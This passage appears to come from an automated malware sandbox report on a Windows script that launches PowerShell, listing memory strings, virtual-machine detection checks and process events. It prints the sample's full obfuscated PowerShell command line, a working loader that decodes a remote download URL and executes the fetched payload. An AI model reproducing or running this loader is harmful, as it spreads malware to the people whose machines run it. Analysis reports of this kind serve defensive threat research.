Source: wscript.exe, 00000000.00000003.1717643536.000001DC5CB18000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}$
Source: wscript.exe, 00000000.00000002.1719782675.000001DC5EB96000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 2-0000F81FEDEE}\InstanceEE}iskHyper-V Guest Service InterfacevmicheartbeatHyper-V Data Exchange ServiceHyper-V Remote Desktop Virtualization ServicevmicshutdownHyper-V Time Synchronization ServiceHyper-V PowerShell Direct ServicevmicvssVolume
Source: wscript.exe, 00000000.00000002.1719282268.000001DC5CB2A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1718125576.000001DC5CB25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1708284459.000001DC5CB05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1718434684.000001DC5CB26000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1717643536.000001DC5CB18000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0G
Source: wscript.exe, 00000000.00000003.1718075633.000001DC5EB8A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \Registry\Machine\Software\Classes\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\InstanceEE}iskHyper-V Guest Service InterfacevmicheartbeatHyper-V Data Exchange ServiceHyper-V Remote Desktop Virtualization ServicevmicshutdownHyper-V Time Synchronization ServiceHyper-V PowerShell Direct ServicevmicvssVolume
Source: wscript.exe, 00000000.00000003.1718684416.000001DC5CB1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719184508.000001DC5CB1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1717643536.000001DC5CB18000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Win32_ServiceStoppedOKvmicguestinterfacevmicguestinterfaceProvides an interface for the Hyper-V host to interact with specific services running inside the virtual machine.Share ProcessManualNormalC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -pLocalSystemHyper-V Guest Service InterfaceHyper-V Guest Service InterfaceWin32_ServiceWin32_ComputerSystemuser-PCvmicguestinterfaceLMEM@
Source: wscript.exe, 00000000.00000003.1717643536.000001DC5CB18000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: wscript.exe, 00000000.00000003.1708614080.000001DC5EADB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1717547305.000001DC5EADB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1708336841.000001DC5EADB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1707930917.000001DC5EADB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719617454.000001DC5EADB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000001.00000002.3013440346.000001ADE7FC0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWho%SystemRoot%\system32\mswsock.dllikky pltrid K tMis ');$semicolloquially=doublecrossing ' F $.oaLHlei N gRovhReitMi as ng PreBad6Ur.8Fum.strDTypo Prwsydn rulozooAu aFerdan FBetiB ml beeMyo(Pse$ onEOffn Unc mohInceKorsCicoaftnser,sep$C,aB EmiPunl Asl s aU raNo@
Source: wscript.exe, 00000000.00000002.1719491235.000001DC5EA77000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\Xe
Source: wscript.exe, 00000000.00000003.1717643536.000001DC5CB18000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Win32_ServiceStoppedOKvmicheartbeatvmicheartbeatUnknownUnknownUnknownWin32_ServiceWin32_ComputerSystemJONES-PCvmicheartbeat
Source: wscript.exe, 00000000.00000003.1718684416.000001DC5CB1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719184508.000001DC5CB1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1717643536.000001DC5CB18000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Provides an interface for the Hyper-V host to interact with specific services running inside the virtual machine.
Source: wscript.exe, 00000000.00000003.1718684416.000001DC5CB1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719184508.000001DC5CB1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1717643536.000001DC5CB18000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: wscript.exe, 00000000.00000003.1717643536.000001DC5CB18000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Win32_ServiceStoppedOKvmicvssvmicvssUnknownUnknownUnknownWin32_ServiceWin32_ComputerSystemJONES-PCvmicvssn
Source: wscript.exe, 00000000.00000003.1717643536.000001DC5CB18000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Yara match File source: amsi64_7444.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7444, type: MEMORYSTR
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#selvhrdendes Opdrager Hjremarginerne Dundertaler #>;$Usolidere43='Councilmen';<#Herredmmer Plasmagenic Jdindernes suttene Korjambisk decelerationsbanen Udskejelser #>;$Dimit=$host.PrivateData;If ($Dimit) {$Pantagraphic++;}function doublecrossing($spisevgringer253){$Driftsbesparelse=$Gucki+$spisevgringer253.Length-$Pantagraphic;for( $Crunchingly=3;$Crunchingly -lt $Driftsbesparelse;$Crunchingly+=4){$Nikeno+=$spisevgringer253[$Crunchingly];}$Nikeno;}function tramelling($Perhapses){ & ($boligydelsen) ($Perhapses);}$sortkldt=doublecrossing 'talM ,fospazLociDatls il Kna D,/Asy5 ke.Ind0Res Lo,(svaW oiHornfordf noanswA ss sm CoN,jrT s. Art1Epa0so,.vet0,ie;P r shoWpasi enA.y6D g4Hav;C b seexLtr6De 4 lo;Mis oerChev ,r: Ud1Ans2tra1Fer.Ri.0Unl)Les ChaG FrestocNe kUndo Ar/sor2Mur0.au1Lok0 F 0Zef1Pso0 Do1 Pr IdFEmiiVenrTegeModf umocanx a/E.i1Out2Ung1Mos. n0 A. ';$Panservaaben=doublecrossing ' s UDiss PaE AsR.lt- Unap lGTapeBjlnOlet r ';$Encheson=doublecrossing 'Gyrh aatP ntPespKnas Ti:Beh/ i/Le d T.rFrai RevFrieImp. s g Inosl.oMosg Jal steHys.RencAngomidmUn,/ vuPercWhe? Kne ndx stp ero rrct tplu=Pred H,ostiwpannsy,lIm oBriaEssd il&KaliF,idE f=h s1LanO DuQTyrEB rlAcc7OveU ,aGsulOPipyUncKsids VaPDecd ,aR npJ Gr9Dis1 eng L wH mqst os,rI ifV T NLinNindRLinsJea6stiPOmbVFur9 ti4Bri ';$Dioxid=doublecrossing ' s.>Fib ';$boligydelsen=doublecrossing 's aistoeAppxs m ';$Manducation='springklaps';$Drinksenes='\Paralytical.Nap';tramelling (doublecrossing 'Otu$Ar gstjl,hooEf.bCl,aCavlBev:Gerc R o Fiu RinepotsaceCamrEvaaLnorBregGr u eelimsVis=Egy$WooeJ.nn olvs l:MedaDmppTw.pPred aaasyrtMaravu.+ yk$ M DHipr eliKilnpeakskasNonepitnPhaeTilsFur ');tramelling (doublecrossing ',or$sozg emlD ro KebA taUnilPra:AcrsI vtImpyG,irE otBindManyRookFa kU ceButr Ln=Pol$ AtEAman.ykcBilhIndes.hsKeeoJobn Pa.Tyns ekpsy,lsleiAb tHav(Bil$ svD.eyiUngoCruxPleiDord To) sc ');tramelling (doublecrossing 'Maw[DifNCamestrtTer.kilsV,le sir Mev FaiBescDaweFerPTheoHypiUndnso.tNskM s.a M ns,maspegsameRidr K ] a: on:Na.sdove ApcHabuPa.r ,riJart apyskuPst,rA coskatA koF,lcAn o NelNon n= Nu kv[ ndNR aeQuatCo . VasPite BacstousynrA gisartLgtyOplPNerrTrao TrtBndoGlucHe oCyclAlaTR gyEkspsa e d]Avo:F r: phTNonlMarsP,e1s o2Idi ');$Encheson=$styrtdykker[0];$Northwardly=(doublecrossing ' Ou$sogGs mLPlaONonBTerAGlaL Or:steLIntIs oGUn H ktT p,a MtGForesl.6 Ma8s,v=optnAarE BawPar-TheostaBMilJIfaE HoC UvTnon EarsF rYLa.s.potFeeED lMHov.DelNK aE untFor.OvewJonEA,sbOplCGelL KeIsenePs nAndT sp ');tramelling ($Northwardly);tramelling (doublecrossing ' Cr$DiaLRe iDkfgL phEmutAfkaRidgEnfeFre6Til8Cir.MarHOvaePa asa.dVapestar sesFag[ un$ConPToraVo n D sBl eConrP lv TuaRa ashob Ade AnnCem].as= p$At s Kao.ntrPhotFikky pltrid K tMis ');$semicolloquially=doublecrossing ' F $.oaLHlei N gRovhReitMi as ng PreBad6Ur.8Fum.strDTypo Prwsydn rulozooAu aFerdan FBetiB ml beeMyo(Pse$ onEOffn Unc mohI Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#selvhrdendes opdrager hjremarginerne dundertaler #>;$usolidere43='councilmen';<#herredmmer plasmagenic jdindernes suttene korjambisk decelerationsbanen udskejelser #>;$dimit=$host.privatedata;if ($dimit) {$pantagraphic++;}function doublecrossing($spisevgringer253){$driftsbesparelse=$gucki+$spisevgringer253.length-$pantagraphic;for( $crunchingly=3;$crunchingly -lt $driftsbesparelse;$crunchingly+=4){$nikeno+=$spisevgringer253[$crunchingly];}$nikeno;}function tramelling($perhapses){ & ($boligydelsen) ($perhapses);}$sortkldt=doublecrossing 'talm ,fospazlocidatls il kna d,/asy5 ke.ind0res lo,(svaw oihornfordf noanswa ss sm con,jrt s. art1epa0so,.vet0,ie;p r showpasi ena.y6d g4hav;c b seexltr6de 4 lo;mis oerchev ,r: ud1ans2tra1fer.ri.0unl)les chag frestocne kundo ar/sor2mur0.au1lok0 f 0zef1pso0 do1 pr idfemiivenrtegemodf umocanx a/e.i1out2ung1mos. n0 a. ';$panservaaben=doublecrossing ' s udiss pae asr.lt- unap lgtapebjlnolet r ';$encheson=doublecrossing 'gyrh aatp ntpespknas ti:beh/ i/le d t.rfrai revfrieimp. s g inosl.omosg jal stehys.rencangomidmun,/ vupercwhe? kne ndx stp ero rrct tplu=pred h,ostiwpannsy,lim obriaessd il&kalif,ide f=h s1lano duqtyreb rlacc7oveu ,agsulopipyuncksids vapdecd ,ar npj gr9dis1 eng l wh mqst os,ri ifv t nlinnindrlinsjea6stipombvfur9 ti4bri ';$dioxid=doublecrossing ' s.>fib ';$boligydelsen=doublecrossing 's aistoeappxs m ';$manducation='springklaps';$drinksenes='\paralytical.nap';tramelling (doublecrossing 'otu$ar gstjl,hooef.bcl,acavlbev:gerc r o fiu rinepotsacecamrevaalnorbreggr u eelimsvis=egy$wooej.nn olvs l:medadmpptw.ppred aaasyrtmaravu.+ yk$ m dhipr elikilnpeakskasnonepitnphaetilsfur ');tramelling (doublecrossing ',or$sozg emld ro keba taunilpra:acrsi vtimpyg,ire otbindmanyrookfa ku cebutr ln=pol$ ateaman.ykcbilhindes.hskeeojobn pa.tyns ekpsy,lsleiab thav(bil$ svd.eyiungocruxpleidord to) sc ');tramelling (doublecrossing 'maw[difncamestrtter.kilsv,le sir mev faibescdaweferptheohypiundnso.tnskm s.a m ns,maspegsameridr k ] a: on:na.sdove apchabupa.r ,rijart apyskupst,ra coskata kof,lcan o nelnon n= nu kv[ ndnr aequatco . vaspite bacstousynra gisartlgtyoplpnerrtrao trtbndogluche ocyclalatr gyekspsa e d]avo:f r: phtnonlmarsp,e1s o2idi ');$encheson=$styrtdykker[0];$northwardly=(doublecrossing ' ou$soggs mlplaononbteraglal or:stelintis ogun h ktt p,a mtgforesl.6 ma8s,v=optnaare bawpar-theostabmiljifae hoc uvtnon earsf ryla.s.potfeeed lmhov.delnk ae untfor.ovewjonea,sboplcgell keiseneps nandt sp ');tramelling ($northwardly);tramelling (doublecrossing ' cr$dialre idkfgl phemutafkaridgenfefre6til8cir.marhovaepa asa.dvapestar sesfag[ un$conptoravo n d sbl econrp lv tuara ashob ade anncem].as= p$at s kao.ntrphotfikky pltrid k tmis ');$semicolloquially=doublecrossing ' f $.oalhlei n grovhreitmi as ng prebad6ur.8fum.strdtypo prwsydn rulozooau aferdan fbetib ml beemyo(pse$ oneoffn unc mohi
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#selvhrdendes opdrager hjremarginerne dundertaler #>;$usolidere43='councilmen';<#herredmmer plasmagenic jdindernes suttene korjambisk decelerationsbanen udskejelser #>;$dimit=$host.privatedata;if ($dimit) {$pantagraphic++;}function doublecrossing($spisevgringer253){$driftsbesparelse=$gucki+$spisevgringer253.length-$pantagraphic;for( $crunchingly=3;$crunchingly -lt $driftsbesparelse;$crunchingly+=4){$nikeno+=$spisevgringer253[$crunchingly];}$nikeno;}function tramelling($perhapses){ & ($boligydelsen) ($perhapses);}$sortkldt=doublecrossing 'talm ,fospazlocidatls il kna d,/asy5 ke.ind0res lo,(svaw oihornfordf noanswa ss sm con,jrt s. art1epa0so,.vet0,ie;p r showpasi ena.y6d g4hav;c b seexltr6de 4 lo;mis oerchev ,r: ud1ans2tra1fer.ri.0unl)les chag frestocne kundo ar/sor2mur0.au1lok0 f 0zef1pso0 do1 pr idfemiivenrtegemodf umocanx a/e.i1out2ung1mos. n0 a. ';$panservaaben=doublecrossing ' s udiss pae asr.lt- unap lgtapebjlnolet r ';$encheson=doublecrossing 'gyrh aatp ntpespknas ti:beh/ i/le d t.rfrai revfrieimp. s g inosl.omosg jal stehys.rencangomidmun,/ vupercwhe? kne ndx stp ero rrct tplu=pred h,ostiwpannsy,lim obriaessd il&kalif,ide f=h s1lano duqtyreb rlacc7oveu ,agsulopipyuncksids vapdecd ,ar npj gr9dis1 eng l wh mqst os,ri ifv t nlinnindrlinsjea6stipombvfur9 ti4bri ';$dioxid=doublecrossing ' s.>fib ';$boligydelsen=doublecrossing 's aistoeappxs m ';$manducation='springklaps';$drinksenes='\paralytical.nap';tramelling (doublecrossing 'otu$ar gstjl,hooef.bcl,acavlbev:gerc r o fiu rinepotsacecamrevaalnorbreggr u eelimsvis=egy$wooej.nn olvs l:medadmpptw.ppred aaasyrtmaravu.+ yk$ m dhipr elikilnpeakskasnonepitnphaetilsfur ');tramelling (doublecrossing ',or$sozg emld ro keba taunilpra:acrsi vtimpyg,ire otbindmanyrookfa ku cebutr ln=pol$ ateaman.ykcbilhindes.hskeeojobn pa.tyns ekpsy,lsleiab thav(bil$ svd.eyiungocruxpleidord to) sc ');tramelling (doublecrossing 'maw[difncamestrtter.kilsv,le sir mev faibescdaweferptheohypiundnso.tnskm s.a m ns,maspegsameridr k ] a: on:na.sdove apchabupa.r ,rijart apyskupst,ra coskata kof,lcan o nelnon n= nu kv[ ndnr aequatco . vaspite bacstousynra gisartlgtyoplpnerrtrao trtbndogluche ocyclalatr gyekspsa e d]avo:f r: phtnonlmarsp,e1s o2idi ');$encheson=$styrtdykker[0];$northwardly=(doublecrossing ' ou$soggs mlplaononbteraglal or:stelintis ogun h ktt p,a mtgforesl.6 ma8s,v=optnaare bawpar-theostabmiljifae hoc uvtnon earsf ryla.s.potfeeed lmhov.delnk ae untfor.ovewjonea,sboplcgell keiseneps nandt sp ');tramelling ($northwardly);tramelling (doublecrossing ' cr$dialre idkfgl phemutafkaridgenfefre6til8cir.marhovaepa asa.dvapestar sesfag[ un$conptoravo n d sbl econrp lv tuara ashob ade anncem].as= p$at s kao.ntrphotfikky pltrid k tmis ');$semicolloquially=doublecrossing ' f $.oalhlei n grovhreitmi as ng prebad6ur.8fum.strdtypo prwsydn rulozooau aferdan fbetib ml beemyo(pse$ oneoffn unc mohi Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs